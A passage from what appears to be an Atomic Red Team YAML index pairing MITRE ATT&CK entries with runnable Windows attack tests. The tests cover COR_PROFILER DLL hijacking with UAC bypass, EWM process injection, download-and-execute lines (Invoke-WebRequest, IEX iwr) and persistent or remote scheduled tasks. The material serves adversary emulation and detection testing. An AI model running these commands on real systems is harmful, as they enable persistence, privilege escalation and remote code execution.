Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object
Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation:
win_clsid_key) Then, adversaries may create custom consoles with the “Link
to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation:
mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc.(Citation:
abusing_com_reg)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Wes Hurd
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
atomic_tests: []
T1564.010:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1
created: '2021-11-19T14:13:11.335Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1564/010
external_id: T1564.010
- source_name: Microsoft PEB 2021
description: Microsoft. (2021, October 6). PEB structure (winternl.h). Retrieved
November 19, 2021.
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb
- source_name: Xpn Argue Like Cobalt 2019
description: Chester, A. (2019, January 28). How to Argue like Cobalt Strike.
Retrieved November 19, 2021.
url: https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/
- source_name: Cobalt Strike Arguments 2019
description: Mudge, R. (2019, January 2). https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/.
Retrieved November 19, 2021.
url: https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/
- source_name: Nviso Spoof Command Line 2020
description: 'Daman, R. (2020, February 4). The return of the spoof part 2:
Command line spoofing. Retrieved November 19, 2021.'
url: https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/
- source_name: FireEye FiveHands April 2021
description: 'McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447
SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved
June 2, 2021.'
url: https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:40.325Z'
name: Process Argument Spoofing
description: |-
Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
Adversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://attack.mitre.org/techniques/T1106) WriteProcessMemory() function) then resume process execution with malicious arguments.(Citation: Cobalt Strike Arguments 2019)(Citation: Xpn Argue Like Cobalt 2019)(Citation: Nviso Spoof Command Line 2020)
Adversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.(Citation: FireEye FiveHands April 2021)
This behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://attack.mitre.org/techniques/T1134/004)) to manipulate or further evade process-based detections.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
atomic_tests: []
T1574.012:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335
created: '2020-06-24T22:30:55.843Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/012
external_id: T1574.012
- source_name: Microsoft Profiling Mar 2017
description: Microsoft. (2017, March 30). Profiling Overview. Retrieved June
24, 2020.
url: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview
- source_name: Microsoft COR_PROFILER Feb 2013
description: Microsoft. (2013, February 4). Registry-Free Profiler Startup
and Attach. Retrieved June 24, 2020.
url: https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)
- source_name: RedCanary Mockingbird May 2020
description: Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved
May 26, 2020.
url: https://redcanary.com/blog/blue-mockingbird-cryptominer/
- source_name: Red Canary COR_PROFILER May 2020
description: Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation
for persistence. Retrieved June 24, 2020.
url: https://redcanary.com/blog/cor_profiler-for-persistence/
- source_name: Almond COR_PROFILER Apr 2019
description: Almond. (2019, April 30). UAC bypass via elevated .NET applications.
Retrieved June 24, 2020.
url: https://offsec.almond.consulting/UAC-bypass-dotnet.html
- source_name: GitHub OmerYa Invisi-Shell
description: Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24,
2020.
url: https://github.com/OmerYa/Invisi-Shell
- source_name: subTee .NET Profilers May 2017
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:40.510Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jesse Brown, Red Canary
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1574.012
atomic_tests:
- name: User scope COR_PROFILER
auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
description: |
Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.
Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
the notepad process will not execute with high integrity.
Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
supported_platforms:
- windows
input_arguments:
file_name:
description: unmanaged profiler DLL
type: path
default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
clsid_guid:
description: custom clsid guid
type: string
default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
dependency_executor_name: powershell
dependencies:
- description: '"#{file_name}" must be present
'
prereq_command: 'if (Test-Path "#{file_name}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{file_name}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
executor:
command: |
Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value "#{file_name}" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value "#{file_name}" -Force | Out-Null
Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
START MMC.EXE EVENTVWR.MSC
cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\"
-Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment
-Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty
-Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore
| Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\"
-Force -ErrorAction Ignore | Out-Null\n"
name: powershell
- name: System Scope COR_PROFILER
auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310
description: |
Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
supported_platforms:
- windows
input_arguments:
file_name:
description: unmanaged profiler DLL
type: path
default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
clsid_guid:
description: custom clsid guid
type: string
default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
dependency_executor_name: powershell
dependencies:
- description: '"#{file_name}" must be present
'
prereq_command: 'if (Test-Path "#{file_name}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{file_name}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
executor:
command: |
Write-Host "Creating system environment variables" -ForegroundColor Cyan
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value "#{file_name}" -Force | Out-Null
cleanup_command: |
Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
name: powershell
elevation_required: true
- name: Registry-free process scope COR_PROFILER
auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817
description: |
Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.
Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
supported_platforms:
- windows
input_arguments:
file_name:
description: unamanged profiler DLL
type: path
default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
clsid_guid:
description: custom clsid guid
type: string
default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
dependency_executor_name: powershell
dependencies:
- description: '"#{file_name}" must be present
'
prereq_command: 'if (Test-Path "#{file_name}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{file_name}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
executor:
command: |
$env:COR_ENABLE_PROFILING = 1
$env:COR_PROFILER = '#{clsid_guid}'
$env:COR_PROFILER_PATH = '"#{file_name}"'
POWERSHELL -c 'Start-Sleep 1'
cleanup_command: |
$env:COR_ENABLE_PROFILING = 0
$env:COR_PROFILER = ''
$env:COR_PROFILER_PATH = ''
name: powershell
privilege-escalation:
T1055.011:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298
created: '2020-01-14T17:18:32.126Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055/011
external_id: T1055.011
- source_name: Microsoft Window Classes
description: Microsoft. (n.d.). About Window Classes. Retrieved December 16,
2017.
url: https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx
- source_name: Microsoft GetWindowLong function
description: Microsoft. (n.d.). GetWindowLong function. Retrieved December
16, 2017.
url: https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx
- source_name: Microsoft SetWindowLong function
description: Microsoft. (n.d.). SetWindowLong function. Retrieved December
16, 2017.
url: https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx
- source_name: Elastic Process Injection July 2017
description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: MalwareTech Power Loader Aug 2013
description: MalwareTech. (2013, August 13). PowerLoader Injection – Something
truly amazing. Retrieved December 16, 2017.
url: https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html
- source_name: WeLiveSecurity Gapz and Redyms Mar 2013
description: Matrosov, A. (2013, March 19). Gapz and Redyms droppers based
on Power Loader code. Retrieved December 16, 2017.
url: https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/
- source_name: Microsoft SendNotifyMessage function
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
url: https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:19.059Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
elevate privileges. EWM injection is a method of executing arbitrary code
in the address space of a separate live process. \n\nBefore creating a window,
graphical Windows-based processes must prescribe to or register a windows
class, which stipulate appearance and behavior (via windows procedures, which
are functions that handle input/output of data).(Citation: Microsoft Window
Classes) Registration of new windows classes can include a request for up
to 40 bytes of EWM to be appended to the allocated memory of each instance
of that class. This EWM is intended to store data specific to that window
and has specific application programming interface (API) functions to set
and get its value. (Citation: Microsoft GetWindowLong function) (Citation:
Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough
to store a 32-bit pointer and is often used to point to a windows procedure.
Malware may possibly utilize this memory location in part of an attack chain
that includes writing code to shared sections of the process’s memory, placing
a pointer to the code in EWM, then invoking execution by returning execution
control to the address in the process’s EWM.\n\nExecution granted through
EWM injection may allow access to both the target process's memory and possibly
elevated privileges. Writing payloads to shared sections also avoids the use
of highly monitored API calls such as WriteProcessMemory and
CreateRemoteThread.(Citation: Elastic Process Injection July
2017) More sophisticated malware samples may also potentially bypass protection
mechanisms such as data execution prevention (DEP) by triggering a combination
of windows procedures and other system functions that will rewrite the malicious
payload inside an executable portion of the target process. (Citation: MalwareTech
Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n\nRunning
code in the context of another process may allow access to the process's memory,
system/network resources, and possibly elevated privileges. Execution via
EWM injection may also evade detection from security products since the execution
is masked under a legitimate process. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1055.011
atomic_tests:
- name: Process Injection via Extra Window Memory (EWM) x64 executable
auto_generated_guid: 93ca40d2-336c-446d-bcef-87f14d438018
description: Hooks functions of main process to inject a payload via Extra Window
Memory (EWM) injection technique
supported_platforms:
- windows
input_arguments:
arch:
description: Architecture of payload. One of (x64, x86)
type: string
default: x64
exe_binary:
description: PE binary for EWM injection
type: path
default: PathToAtomicsFolder\T1055.011\bin\T1055.011_#{arch}.exe
payload_file:
description: raw payload to inject
type: path
default: PathToAtomicsFolder\T1055.011\bin\payload.exe_#{arch}.bin
dependency_executor_name: powershell
dependencies:
- description: 'T1055.011x64.exe and payload must exist on disk at specified
location (#{exe_binary} and #{payload_file})'
prereq_command: 'if (Test-Path #{exe_binary}) {exit 0} else {exit 1}'
get_prereq_command: |-
New-Item -Type Directory (split-path #{exe_binary}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.011/bin/T1055.011_#{arch}.exe" -OutFile "#{exe_binary}" -UseBasicParsing
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.011/bin/payload.exe_#{arch}.bin" -OutFile "#{payload_file}" -UseBasicParsing
executor:
command: "#{exe_binary}"
cleanup_command: Get-Process -Name Notepad -ErrorAction SilentlyContinue |
Stop-Process -Force
name: powershell
elevation_required: false
T1053.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9
created: '2019-11-27T14:58:00.429Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1053/005
external_id: T1053.005
- source_name: ProofPoint Serpent
description: Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New
Backdoor Targets French Entities with Unique Attack Chain. Retrieved April
11, 2022.
url: https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain
- source_name: Defending Against Scheduled Task Attacks in Windows Environments
description: Harshal Tupsamudre. (2022, June 20). Defending Against Scheduled
Tasks. Retrieved July 5, 2022.
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
September 12, 2024.
url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
Retrieved June 1, 2022.
url: https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events
- source_name: TechNet Scheduled Task Events
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
- source_name: Red Canary - Atomic Red Team
description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
Task/Job: Scheduled Task. Retrieved June 19, 2024.'
url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
url: https://technet.microsoft.com/en-us/sysinternals/bb963902
- source_name: TechNet Forum Scheduled Task Operational Setting
description: Satyajit321. (2015, November 3). Scheduled Tasks History Retention
settings. Retrieved December 12, 2017.
url: https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen
- source_name: SigmaHQ
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
- source_name: Stack Overflow
description: Stack Overflow. (n.d.). How to find the location of the Scheduled
Tasks folder. Retrieved June 19, 2024.
url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:19.176Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
wrapper for the Windows Task Scheduler, and alternatively, adversaries have
used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
(WMI) to create a scheduled task. Adversaries may also utilize the Powershell
Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
system startup or on a scheduled basis for persistence. The Windows Task Scheduler
can also be abused to conduct remote Execution as part of Lateral Movement
and/or to run a process under the context of a specified account (such as
SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible
to defender tools and manual queries used to enumerate tasks. Specifically,
an adversary may hide a task from `schtasks /query` and the Task Scheduler
by deleting the associated Security Descriptor (SD) registry value (where
deletion of this value must be completed using SYSTEM permissions).(Citation:
SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate
methods to hide tasks, such as altering the metadata (e.g., `Index` value)
within associated registry keys.(Citation: Defending Against Scheduled Task
Attacks in Windows Environments) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Andrew Northern, @ex_raritas
- Bryan Campbell, @bry_campbell
- Selena Larson, @selenalarson
- Sittikorn Sangrattanapitak
- Zachary Abzug, @ZackDoesML
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.8'
x_mitre_remote_support: false
identifier: T1053.005
atomic_tests:
- name: Scheduled Task Startup Script
auto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2
description: |
Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view
the tasks, open the Task Scheduler and look in the Active Tasks pane.
supported_platforms:
- windows
executor:
command: |
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
cleanup_command: |
schtasks /delete /tn "T1053_005_OnLogon" /f >nul 2>&1
schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: Scheduled task Local
auto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71
description: 'Upon successful execution, cmd.exe will create a scheduled task
to spawn cmd.exe at 20:10.
'
supported_platforms:
- windows
input_arguments:
task_command:
description: What you want to execute
type: string
default: C:\windows\system32\cmd.exe
time:
description: What time 24 Hour
type: string
default: '20:10'
executor:
name: command_prompt
elevation_required: false
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
'
cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
'
- name: Scheduled task Remote
auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
description: |
Create a task on a remote system.
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.
supported_platforms:
- windows
input_arguments:
task_command:
description: What you want to execute
type: string
default: C:\windows\system32\cmd.exe
time:
description: What time 24 Hour
type: string
default: '20:10'
target:
description: Target
type: string
default: localhost
user_name:
description: 'Username to authenticate with, format: DOMAIN\User'
type: string
default: DOMAIN\user
password:
description: Password to authenticate with
type: string
default: At0micStrong
executor:
name: command_prompt
elevation_required: true
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password}
/TN "Atomic task" /F >nul 2>&1
'
- name: Powershell Cmdlet Scheduled Task
auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
description: |
Create an atomic scheduled task that leverages native powershell cmdlets.
Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
>$null 2>&1
'
- name: Task Scheduler via VBA
auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
description: |
This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within
30 - 40 seconds after this module has run
supported_platforms:
- windows
input_arguments:
ms_product:
description: Maldoc application Word
type: string
default: Word
dependency_executor_name: powershell
dependencies:
- description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
'
executor:
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
-UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
-officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
name: powershell
cleanup_command: 'Unregister-ScheduledTask -TaskName "Run Notepad" -Confirm:$false
'
